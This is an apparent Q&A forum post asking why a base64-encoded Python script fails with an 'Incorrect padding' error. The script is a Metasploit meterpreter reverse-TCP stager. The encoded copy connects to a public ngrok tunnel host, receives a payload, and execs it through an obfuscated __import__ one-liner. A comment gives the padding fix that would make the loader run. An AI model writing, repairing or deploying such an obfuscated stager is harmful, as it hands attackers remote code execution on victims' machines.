# binascii.Error: Incorrect padding in python base64

Tags: python, sockets, base64

i tried excute my encoded socked script with base64.

and i first converted my python script to base64 string like this:

code:

```
import socket
import time
import struct
import zlib
import base64
import ctypes
import imp
for x in range(10):
    try:
        s=socket.socket(2,socket.SOCK_STREAM)
        s.connect(('127.0.0.1',4444))
        break
    except:
        time.sleep(5)
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
    d+=s.recv(l-len(d))
exec(zlib.decompress(base64.b64decode(d)),{'s':s})
```

And this is encoded version(string):

> aW1wb3J0IHNvY2tldAppbXBvcnQgdGltZQppbXBvcnQgc3RydWN0CmltcG9ydCB6bGliCmltcG9ydCBiYXNlNjQKaW1wb3J0IGN0eXBlcwppbXBvcnQgaW1wCmZvciB4IGluIHJhbmdlKDEwKToKCXRyeToKCQlzPXNvY2tldC5zb2NrZXQoMixzb2NrZXQuU09DS19TVFJFQU0pCgkJcy5jb25uZWN0KCgnNi50Y3Aubmdyb2suaW8nLDEyMDI5KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc-SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyh6bGliLmRlY29tcHJlc3MoYmFzZTY0LmI2NGRlY29kZShkKSkseydzJzpzfSk

and i tried this method to execute encoded script like this:

```
exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldAppbXBvcnQgdGltZQppbXBvcnQgc3RydWN0CmltcG9ydCB6bGliCmltcG9ydCBiYXNlNjQKaW1wb3J0IGN0eXBlcwppbXBvcnQgaW1wCmZvciB4IGluIHJhbmdlKDEwKToKCXRyeToKCQlzPXNvY2tldC5zb2NrZXQoMixzb2NrZXQuU09DS19TVFJFQU0pCgkJcy5jb25uZWN0KCgnNi50Y3Aubmdyb2suaW8nLDEyMDI5KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc-SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyh6bGliLmRlY29tcHJlc3MoYmFzZTY0LmI2NGRlY29kZShkKSkseydzJzpzfSk')[0]))
```

When i run it im getting this error:

> Traceback (most recent call last):   File
> "C:\Users\sadettin\Desktop\Project.py", line 1, in 
> exec(**import**('base64').b64decode(**import**('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldAppbXBvcnQgdGltZQppbXBvcnQgc3RydWN0CmltcG9ydCB6bGliCmltcG9ydCBiYXNlNjQKaW1wb3J0IGN0eXBlcwppbXBvcnQgaW1wCmZvciB4IGluIHJhbmdlKDEwKToKCXRyeToKCQlzPXNvY2tldC5zb2NrZXQoMixzb2NrZXQuU09DS19TVFJFQU0pCgkJcy5jb25uZWN0KCgnNi50Y3Aubmdyb2suaW8nLDEyMDI5KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc-SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyh6bGliLmRlY29tcHJlc3MoYmFzZTY0LmI2NGRlY29kZShkKSkseydzJzpzfSk')[0]))
> File
> "C:\Users\sadettin\AppData\Local\Programs\Python\Python36\lib\base64.py",
> line 87, in b64decode
> return binascii.a2b_base64(s) binascii.Error: Incorrect padding

How i can fix it?

Comment: @OlvinRoght I know :) its just a metasploit meterpreter im just interested penetration tests.

Comment: Does this answer your question? [Python: Ignore 'Incorrect padding' error when base64 decoding](https://stackoverflow.com/questions/2941995/python-ignore-incorrect-padding-error-when-base64-decoding)

Comment: @OlvinRoght i have looked at this before

Comment: so why didn't you use solution from given answers?

Comment: @OlvinRoght because their answers are not for my code

Comment: They are. TL;DR use `base64.b64decode(d + "==")`

Comment: @OlvinRoght I think i found cause of error, it gives error because script has more than one line. I tested it with oneline code and im not getting errors. So how i fix it?

Comment: You should add padding as I've shown in comment above.